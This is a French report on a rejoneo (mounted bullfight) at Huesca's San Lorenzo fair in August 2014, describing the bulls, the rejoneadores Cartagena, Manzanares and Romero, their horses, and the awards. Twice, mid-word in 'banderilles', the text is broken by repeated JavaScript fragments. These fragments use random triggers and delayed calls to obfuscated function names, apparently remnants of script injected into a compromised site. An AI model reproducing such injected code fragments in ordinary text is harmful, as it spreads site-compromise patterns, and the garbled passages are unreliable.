REJONEO A HUESCA LE 13 AOUT 2014

Huesca 13 Août 2014. Après midi très ventée pour clôturer la Feria de San Lorenzo. Avec plus de 2/3 d’entrées, une corrida de rejones en demi-teinte – plus de cheval que de toreo. Toros de Benitez Cubero, bien présentés, nobles en général,  rasés de près et grassouillets (530 à 590 kgs). De Andy Cartagena, on retiendra le meilleur sur Mediterraneo dans ses poses al violín et à deux mains sur Juncal. – de bonnes séquences également sur Maravilla et Pericalvo.

Manuel Manzanares fut bien au second de l’après midi, spectaculaire aux bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilles sur Garibaldi, juste et dans le tempo avec Principe et Secreto.

Andrés Romero reçut le sixième à porta gayola utilisant ‘el marsellés’* comme leurre. De bonnes séries sur Guajiro au quiebro et aux bandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anderilles sur Bambú.

Andy Cartagena : une oreille et silence

Manuel Manzanares : une oreille et silence

Andrés Romero : silence et silence

* L’origine de ce vêtement chaud est attribuée aux marins ou militaires venant de la ville de Marseille, de passage en Andalousie. A son second, suerte al marsellés remarquée d’Andrés Romero.

Fotos Jean Jacques Dervieux

 

 

[simpleviewer gallery_id="74"]

Les commentaires sont fermés.